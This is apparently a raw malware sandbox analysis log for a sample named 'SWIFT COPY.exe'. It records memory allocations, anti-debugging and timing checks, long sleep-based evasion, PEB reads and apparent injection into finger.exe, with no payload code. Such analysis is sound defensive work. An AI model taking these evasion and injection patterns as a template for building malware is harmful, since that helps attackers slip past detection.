                Source: C:\Windows\SysWOW64\finger.exe, API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 2980000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 2B70000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 2980000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 5170000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 6170000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 62A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 72A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: B4B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: C4B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: C940000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: D940000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: EB40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: FB40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Memory allocated: 10B40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_0137096E rdtsc 3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exe, API coverage: 2.6 %
                Source: C:\Users\user\Desktop\SWIFT COPY.exe TID: 7424, Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe TID: 8048, Thread sleep count: 37 > 30
                Source: C:\Windows\SysWOW64\finger.exe TID: 8048, Thread sleep time: -74000s >= -30000s
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe TID: 8108, Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\finger.exe, Last function: Thread delayed
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 7_2_0288C7B0 FindFirstFileW,FindNextFileW,FindClose,7_2_0288C7B0
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A0E000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000002.3579026296.000000000140F000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2525369322.000001872CEBD000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Process queried: DebugPort
                Source: C:\Windows\SysWOW64\finger.exe, Process queried: DebugPort
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_00417813 LdrLoadDll,3_2_00417813
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014062D6 mov eax, dword ptr fs:[00000030h]3_2_014062D6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov ecx, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C62A0 mov eax, dword ptr fs:[00000030h]3_2_013C62A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E284 mov eax, dword ptr fs:[00000030h]3_2_0136E284
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E284 mov eax, dword ptr fs:[00000030h]3_2_0136E284
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0283 mov eax, dword ptr fs:[00000030h]3_2_013B0283
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013402E1 mov eax, dword ptr fs:[00000030h]3_2_013402E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A2C3 mov eax, dword ptr fs:[00000030h]3_2_0133A2C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340535 mov eax, dword ptr fs:[00000030h]3_2_01340535
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E53E mov eax, dword ptr fs:[00000030h]3_2_0135E53E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6500 mov eax, dword ptr fs:[00000030h]3_2_013C6500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404500 mov eax, dword ptr fs:[00000030h]3_2_01404500
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136656A mov eax, dword ptr fs:[00000030h]3_2_0136656A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338550 mov eax, dword ptr fs:[00000030h]3_2_01338550
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338550 mov eax, dword ptr fs:[00000030h]3_2_01338550
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013545B1 mov eax, dword ptr fs:[00000030h]3_2_013545B1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013545B1 mov eax, dword ptr fs:[00000030h]3_2_013545B1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B05A7 mov eax, dword ptr fs:[00000030h]3_2_013B05A7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E59C mov eax, dword ptr fs:[00000030h]3_2_0136E59C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332582 mov eax, dword ptr fs:[00000030h]3_2_01332582
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01332582 mov ecx, dword ptr fs:[00000030h]3_2_01332582
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01364588 mov eax, dword ptr fs:[00000030h]3_2_01364588
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E5E7 mov eax, dword ptr fs:[00000030h]3_2_0135E5E7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013325E0 mov eax, dword ptr fs:[00000030h]3_2_013325E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C5ED mov eax, dword ptr fs:[00000030h]3_2_0136C5ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C5ED mov eax, dword ptr fs:[00000030h]3_2_0136C5ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013365D0 mov eax, dword ptr fs:[00000030h]3_2_013365D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A5D0 mov eax, dword ptr fs:[00000030h]3_2_0136A5D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A5D0 mov eax, dword ptr fs:[00000030h]3_2_0136A5D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E5CF mov eax, dword ptr fs:[00000030h]3_2_0136E5CF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E5CF mov eax, dword ptr fs:[00000030h]3_2_0136E5CF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132E420 mov eax, dword ptr fs:[00000030h]3_2_0132E420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132C427 mov eax, dword ptr fs:[00000030h]3_2_0132C427
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B6420 mov eax, dword ptr fs:[00000030h]3_2_013B6420
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368402 mov eax, dword ptr fs:[00000030h]3_2_01368402
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135A470 mov eax, dword ptr fs:[00000030h]3_2_0135A470
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC460 mov ecx, dword ptr fs:[00000030h]3_2_013BC460
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA456 mov eax, dword ptr fs:[00000030h]3_2_013EA456
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132645D mov eax, dword ptr fs:[00000030h]3_2_0132645D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135245A mov eax, dword ptr fs:[00000030h]3_2_0135245A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136E443 mov eax, dword ptr fs:[00000030h]3_2_0136E443
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013644B0 mov ecx, dword ptr fs:[00000030h]3_2_013644B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BA4B0 mov eax, dword ptr fs:[00000030h]3_2_013BA4B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013364AB mov eax, dword ptr fs:[00000030h]3_2_013364AB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013EA49A mov eax, dword ptr fs:[00000030h]3_2_013EA49A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013304E5 mov ecx, dword ptr fs:[00000030h]3_2_013304E5
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov eax, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov ecx, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136273C mov eax, dword ptr fs:[00000030h]3_2_0136273C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AC730 mov eax, dword ptr fs:[00000030h]3_2_013AC730
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C720 mov eax, dword ptr fs:[00000030h]3_2_0136C720
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C720 mov eax, dword ptr fs:[00000030h]3_2_0136C720
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330710 mov eax, dword ptr fs:[00000030h]3_2_01330710
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01360710 mov eax, dword ptr fs:[00000030h]3_2_01360710
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C700 mov eax, dword ptr fs:[00000030h]3_2_0136C700
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338770 mov eax, dword ptr fs:[00000030h]3_2_01338770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330750 mov eax, dword ptr fs:[00000030h]3_2_01330750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE75D mov eax, dword ptr fs:[00000030h]3_2_013BE75D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372750 mov eax, dword ptr fs:[00000030h]3_2_01372750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372750 mov eax, dword ptr fs:[00000030h]3_2_01372750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B4755 mov eax, dword ptr fs:[00000030h]3_2_013B4755
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov esi, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov eax, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov eax, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013307AF mov eax, dword ptr fs:[00000030h]3_2_013307AF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E47A0 mov eax, dword ptr fs:[00000030h]3_2_013E47A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D678E mov eax, dword ptr fs:[00000030h]3_2_013D678E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013347FB mov eax, dword ptr fs:[00000030h]3_2_013347FB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013347FB mov eax, dword ptr fs:[00000030h]3_2_013347FB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE7E1 mov eax, dword ptr fs:[00000030h]3_2_013BE7E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133C7C0 mov eax, dword ptr fs:[00000030h]3_2_0133C7C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B07C3 mov eax, dword ptr fs:[00000030h]3_2_013B07C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E627 mov eax, dword ptr fs:[00000030h]3_2_0134E627
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01366620 mov eax, dword ptr fs:[00000030h]3_2_01366620
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368620 mov eax, dword ptr fs:[00000030h]3_2_01368620
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133262C mov eax, dword ptr fs:[00000030h]3_2_0133262C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372619 mov eax, dword ptr fs:[00000030h]3_2_01372619
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE609 mov eax, dword ptr fs:[00000030h]3_2_013AE609
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01362674 mov eax, dword ptr fs:[00000030h]3_2_01362674
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F866E mov eax, dword ptr fs:[00000030h]3_2_013F866E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F866E mov eax, dword ptr fs:[00000030h]3_2_013F866E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A660 mov eax, dword ptr fs:[00000030h]3_2_0136A660
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A660 mov eax, dword ptr fs:[00000030h]3_2_0136A660
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134C640 mov eax, dword ptr fs:[00000030h]3_2_0134C640
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013666B0 mov eax, dword ptr fs:[00000030h]3_2_013666B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C6A6 mov eax, dword ptr fs:[00000030h]3_2_0136C6A6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334690 mov eax, dword ptr fs:[00000030h]3_2_01334690
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334690 mov eax, dword ptr fs:[00000030h]3_2_01334690
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B06F1 mov eax, dword ptr fs:[00000030h]3_2_013B06F1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B06F1 mov eax, dword ptr fs:[00000030h]3_2_013B06F1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0136A6C7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A6C7 mov eax, dword ptr fs:[00000030h]3_2_0136A6C7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404940 mov eax, dword ptr fs:[00000030h]3_2_01404940
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B892A mov eax, dword ptr fs:[00000030h]3_2_013B892A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C892B mov eax, dword ptr fs:[00000030h]3_2_013C892B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC912 mov eax, dword ptr fs:[00000030h]3_2_013BC912
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328918 mov eax, dword ptr fs:[00000030h]3_2_01328918
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328918 mov eax, dword ptr fs:[00000030h]3_2_01328918
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE908 mov eax, dword ptr fs:[00000030h]3_2_013AE908
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE908 mov eax, dword ptr fs:[00000030h]3_2_013AE908
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4978 mov eax, dword ptr fs:[00000030h]3_2_013D4978
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4978 mov eax, dword ptr fs:[00000030h]3_2_013D4978
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC97C mov eax, dword ptr fs:[00000030h]3_2_013BC97C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
